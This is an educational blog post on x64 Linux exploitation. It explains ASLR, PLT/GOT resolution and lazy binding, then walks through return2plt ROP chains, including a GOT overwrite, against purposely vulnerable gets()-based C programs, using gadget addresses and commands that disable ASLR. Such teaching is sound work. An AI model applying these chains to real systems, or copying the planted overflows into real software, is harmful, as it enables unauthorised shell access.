Introduction to x64 Linux Binary Exploitation (Part 5)- ASLR

14 min readFeb 16, 2022

This post is the fifth one of a series of articles in which we are exploring some basic x64 Linux Binary Exploitation techniques. We started with a simple buffer overflow in which all memory protection mechanisms were disabled and gradually we enabled them one by one in order to explore how they can be circumvented. More specifically:

In Part 1, we developed a linux executable which was vulnerable to a Buffer Overflow and we exploited it after disabling all the memory protection mechanisms.
In Part 2, we enabled NX and we demonstrated how this protection can be circumvented using a return into library technique.
In Part 3, we enabled NX once again and we demonstrated an additional bypass technique which uses a return into libc technique in conjunction with the mprotect system call.
In Part4, we enabled the stack canaries protection, implemented by the StackGuard extension in gcc and we examined under which conditions it might fail.

In this part we are going to discuss about the Address space layout randomisation (or ASLR in short) and once again we are going to explore if and when it can be bypassed. As always, before we start, you can use the links bellow to navigate to the rest of the other parts:

JMP to PART1 || PART2 || PART3||PART4

About ASLR

Address Space Layout Randomisation is a security technique which is designed to prevent the exploitation of memory corruption vulnerabilities. The principle behind it is to randomly arrange the memory address space of a process including the base of the executable and the positions on the stack, heap and libraries [1]. If the randomisation introduces enough amount of entropy in the address space, then attacks that require a trampoline or a code reuse technique have to use alternative ways to find their way in this random memory space. For example, in Part 3, we had to know the exact address where the libc is loaded in order to perform the return into libc attack. Enabling the ASLR would randomise this address on every single run, making it impossible to predict it. In Linux, you can configure ASLR using the randomize_va_space parameter. More specifically, you can

Disable with:$echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceEnable with:$echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

Regarding the values of the randomize_va_space parameter, from Oracle’s Linux Security Guide we have the following:

0 → Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
1 → Randomise the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
2 → Randomise the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

To change the value permanently, add the setting to /etc/sysctl.conf, for example: kernel.randomize_va_space = value and run the sysctl -p command. To disable ASLR for a specific program and its child processes use: $setarch `uname -m` -R program [args ...] . You can test ASLR by checking the shared library dependencies of an executable using the ldd command:

As this post refers to x64 architectures, in the first part we are going to explore the Return2PLT attack (with a no pie flag), while in the second we are going to chain a BoF with a memory leak vulnerability. For obvious reasons bruteforcing ASLR is not something that we are going to explore:

About PLT and GOT

PLT and GOT are two concepts which are strongly related to the way a binary is compiled and more specifically the way it is linked. Linking is the last step of a compilation process following the Preprocessing and Compilation of a source file. More specifically [2]:

Preprocessing — Processes directives (commands that begin with a # character) which can modify the source code before it is compiled.
Compiling — The modified source code is compiled into binary object code. This code is not yet executable.
Linking — The object code is combined with required supporting code to make an executable program. This step typically involves adding in any libraries that are required.

https://en.wikipedia.org/wiki/Linker_(computing)

There are two types of linking, static and dynamic:

Statically linked binaries are self-contained, having all of the code necessary for them to run within a single file.
Dynamically linked binaries (default by gcc and most other compilers) base a large portion of their functionality to external routines, implemented by external shared libraries.

For example, the system function’s actual implementation is part of the system C library. Typically, on current GNU/Linux systems, this is provided by libc.so.6, which is the name of the current GNU Libc library. Instead of going further into details about the pros and cons of each compilation type, we rather focus on the dynamic linking and more specifically on how these external functions are traced in a randomly allocated virtual memory space.

Relocation

Relocation is the process of connecting symbolic references with symbolic definitions. For example, when a program calls a function, the associated call instruction must transfer control to the proper destination address at execution. Relocatable files must have relocation entries which are necessary because they contain information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process’s program image [3]. So, as you probably understand if we omit the linking step from the overall compilation process, the object file that will be created is not executable and one main reason for that is the the unresolved relocation entries in the Global Offset Table (.got).

In order to understand the resolution process, lets create a simple C program which makes use of the printf function:

#include <stdio.h>
#include <stdlib.h>int main(){printf("Hello ");
    printf("world");
    printf("\n");
    exit(0);
}

Compile it with -no-pie flag in order to avoid some extra entropy and load it to gdb setting a break point in main:

Notice the references to plt section corresponding to the printf, putchar and exit function calls. If we follow these references we will land to the following section:

There we notice a series of jumps (the highlighted ones) to the .got section:

Following these jumps we are finally going to land to the .got table as depicted bellow:

So far we notice that when call to a function of a shared library takes place, the actual address will be fetched from the .got table which is referenced by the .plt table. What remains to answer, is how the .got points to the right addresses and in order to do that lets debug our program using gdb following up with these calls to the .plt and .got sections. Resuming from before, we already setup a breakpoint in main and we are about to follow the call to the printf@plt:

The next jump will be @ QWORD PTR [rip+0x2fa5] which resolves to 0x404020 at the got.plt section. This address, points to 0x401040:

In the .plt section, followed by a jump to 0x401020:

Finally, from 0x401020 we notice a jump to 0x404010 which points to 0x00007ffff7fe7bb0:

which actually belongs to the memory space where the ld library is loaded:

0x00007ffff7fe7bb0 in ?? () from /lib64/ld-linux-x86–64.so.2

Lets write down the jump chain during this first call to printf :

0x40118a @main → 0x401070 @.plt.sec → 0x404020 @.got.plt → 0x404010 @.plt → 0x7ffff7fe7bb0 @ ld

Now set up a second breakpoint right before the second call to the printf function and follow the same process:

This time when we encounter the printf@got.plt entry we notice that it points to 0x00007ffff7e28e10:

which resolves to the printf address:

So, as expected we jump directly to the printf:

Let’s write down the jump chain again:

0x40118a @main → 0x401070 @.plt.sec → 0x404020 @.got.plt → 0x7ffff7e28e10 @ libc

Or, on a better view:

First call to printf@got.plt

second call to printf@got.plt

What happened is that during the first call to printf, the address was not added to the .got table, thus a call to ld had to take place:

The second time though, the address was already known thus our program jumped directly to the printf function. If you wonder why this call to the linker isn’t happening one time (e.g. during the application initialisation) in order to populate the .got table, then the following definition will make it clear for you:

Lazy binding (also known as lazy linking or on-demand symbol resolution) is the process by which symbol resolution isn’t done until a symbol is actually used. Functions can be bound on-demand, but data references can’t…. Lazy binding is implemented by providing some stub code that gets called the first time a function call to a lazy-resolved symbol is made. This stub is responsible for setting up the necessary information for a binding function that the runtime linker provides. The stub code then jumps to it [4].

We are now ready to explore the Return2plt attack and how this might be used in order to bypass ASLR.

Return2plt

This attack requires a position depended executable and no stackguard of course, which means that we have to compile the binary with a-no-pie and -fno-stackprotector flags. Such a binary is typically loaded into the the same base address in virtual memory each time it is executed contrary to a position independent executable (PIE) which is loaded into random locations. This simply means that when PIE is enabled, even if the binary is statically linked, then ROP-type attacks will be more difficult to execute reliably. That being said let’s examine some exploitation cases starting from an easy to more difficult one.

Case 1: Existing call to system(X) function; where X represents a command that can be used in an exploitation scenario;
Plan: Use the BOF to force a call to this function by returning to the address indicated by the GOT relative entry

EXAMPLE:

#include <stdio.h>void unused_shell_func(){
    system("/bin/sh");
}void greet_me()
{
    char name[200];
    
    printf("Enter your name:");
    gets(name);
    printf("Hi there %s !!\n",name);
  
}
int main(int argc, char *argv[])
{
    
    greet_me();
    return 0;  
}

Compile with -no-pie -fno-stack-protector flags and lets get the unused_shell_func address using objdump:

Considering the 16-byte alignment requirement we just need a ret instruction, which we can find in the vuln binary itself:

Our first exploit is straightforward:

As well as the result:

Case 2: Existing call to system(X) function; where X does NOT represents a command that can be used in an exploitation scenario;
Plan: Search for hardcoded strings that can be used to compile a useful X, use BOF in conjunction to rope gadgets in order to set the X parameter to the system function and force a call to it.

EXAMPLE:

#include <stdio.h>void show_date(){
    system("/bin/date");}void greet_me()
{
    char name[200];
    printf("Enter your name:");
    gets(name);
    printf("%s !it is you again  !!! oh my gosh",name);
  
}
int main(int argc, char *argv[])
{
    show_date();
    greet_me();
    return 0;  
}

Thankfully, the developer was mindful enough to leave some useful strings hardcoded. The plan (again) is pretty straightforward:

Search for a hardcoded string that serve our needs. In this case “sh” will do the trick.
ROP our way to system (ret, pop rdi ret)

Using ropper once again, we have the following addresses:

Similarly, gef’s search pattern yields the following results for “sh”:

Finally, the system@plt can be found in the show_date function:

We have everything we need to construct the exploitation script:

And get a shell:

What about if no such useful string exists ?
Plan: Search for hardcoded letters that can be used to compile a useful X; use BOF in conjunction to rope gadgets in order to concatenate those letters; set X as a parameter to the system function and force a call to it.

EXAMPLE:

#include <stdio.h>
#include <string.h>void unused(){
    char dummy1[10];
    char dummy2[10];
    strcpy(dummy1,dummy2);
}void show_date(){
    system("/bin/date");}void greet_me()
{
    char name[200];
    show_date();
    printf("Enter your name:");
    gets(name);
    printf("hi %s !\n",name);
  
}
int main(int argc, char *argv[])
{
    greet_me();
    return 0;  
}

Steps to exploitation:

Search for s,h letters in the non randomised memory space:

set h_address = 0x401034, s_address = 0x400476

Search for memory location to write these letters as string:

set write_to = 0x404038

Search for strcpy() and system() plt entries:

set system = 0x401084, strcpy = 0x401074

Search for gadgets:

We are going to use at maximum two parameters (for the strcpy), so (remember from the C calling convention) we are going to use both $rdi and $rsi. Using, ropper to search for these gadgets we have the following results:

ret = 0x40101a #ret
pop_rdi_ret = 0x4012a3 #pop rdi; ret;
pop_rsi_pop_r15_ret=0x4012a1 #pop rsi; pop r15; ret;

We also going to use a dummy value to satisfy the pop r15: dummy = b’C’ * 8

The final exploit should look like bellow:

Running the exploit, will get us a shell:

Case 3: No system(X) call;
Plan: Overwrite the .got entry to point to the system function

I kept the most interesting case for last where we assume that the vulnerable binary doesn’t contain a call to the system function. Thus, we will try to overwrite the printf GOT entry in order to point to the system function by combining various ROP gadgets. More specifically:

We need to compute the offset between the printf and the system function
Subtract the this offset from the value that they GOT entry points to
Set the proper parameters for the call to the system function
Perform a call to printf at PLT which will now point at system (if everything goes as expected)

We will add some gadgets to our binary (using inline assembly) and although this may seem “forced”, let me assure you that when you exploit a (more) functionally rich binary you will find a rich variety of gadgets. Our last case binary should look like bellow:

TL;DR we forced a sub %rbp, (%rdi); ret; gadget as well as an “sh” string in order to get directly to the point. We will brake the exploit to several steps for clarity, so compile the C code above with gcc -no-pie -fno-stack-protector vuln.c -o vuln -D_FORTIFY_SOURCE=0 and lets try to exploit it:

Step 1: Find the distance between printf and system in libc

After loading the binary to gdb, use the xinfo command to get the virtual address of the system and printf functions:

As the distance between them is going to be constant, we can safely assume the following offset:

offset_to_system = 0x7ffff7e28e10 -0x7ffff7e19410

Step 2: Subtract the offset_to_system from the address where printf@got.plt points to

For this task we will use the “forced” gadget from our code. More specifically we will pop the address of printf@got.plt at the RDI register, then we will pop the offset_to_system to the RBP register and finally we will use the sub %rbp, (%rdi) gadget. Using ropper (or any tool of your preference), locate the following gadgets:

Write down the address of each one:

ret = 0x40101a
pop_rdi_ret=0x401233
pop_rbp_ret=0x40113d
sub_rdi_rbp = 0x401156 #sub qword ptr [rdi], rbp; ret;

And let’s move the next step.

Step 3: Find the address of the “sh” string as well as the address of the printf@plt

Write down the address of each one and lets compile the final exploit:

Redirect the output of the script above to a file named “payload” and load the binary to gdb, setting a breakpoint to the ret instruction of the greet_me() function. Finally, run the binary with r < payload:

After “hitting” the breakpoint we notice the following state in gdb:

The next instruction to be executed is pop rdi at 0x401233
The stack contains the printf@got.plt (0x00000000404018)

After execution RDI will point to printf@got.plt which contains the printf (@libc ) address. After few single steps, we have pop rbp as next instruction and the value 0xfa00 ( refers to 0x7ffff7e28e10 -0x7ffff7e19410) on the top of the stack:

So after execution RBP will contain the 0xfa00 value and what remains is to subtract from the value at 0x00000000404018 the 0xfa00:

The payload went as expected, so next comes, placing the “sh” string to the RDI register and performing a call to the printf@plt:

sh is on the top of the stack and will be popped to RDI

After continuing the execution, we notice a detach after vfork due to the shell spawn:

Which can be verified after running the binary outside of gdb:

Conclusion

We reach up to the end of PART 5 where we bypassed ASLR by using the return2plt exploitation technique. Stay tuned for the last part where we are going to enable all the memory related protections including PIE, NX, StackGuard and ASLR and explore ways of how they can be circumvented.